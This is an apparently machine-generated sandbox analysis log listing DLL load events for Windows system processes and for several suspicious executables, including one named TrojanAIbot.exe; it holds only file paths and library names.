                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\alg.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: dwrite.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: msvcp140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: linkinfo.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ntshrui.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: cscapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: edputil.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dll
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dll
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dll
                        Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\Locator.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\Locator.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\Locator.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\Locator.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\Locator.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\Locator.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\Locator.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: mfplat.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: rtworkq.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.perception.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: mediafoundation.defaultperceptionprovider.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.enumeration.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: structuredquery.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.globalization.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47mrm.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: icu.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: mswb7.dll
                        Source: C:\Windows\System32\SensorDataService.exeSection loaded: devdispitemprovider.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: napinsp.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: pnrpnsp.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: wshbth.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: nlaapi.dll
                        Source: C:\Windows\System32\snmptrap.exeSection loaded: winrnr.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: spectrumsyncclient.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\Spectrum.exeSection loaded: winhttp.dll
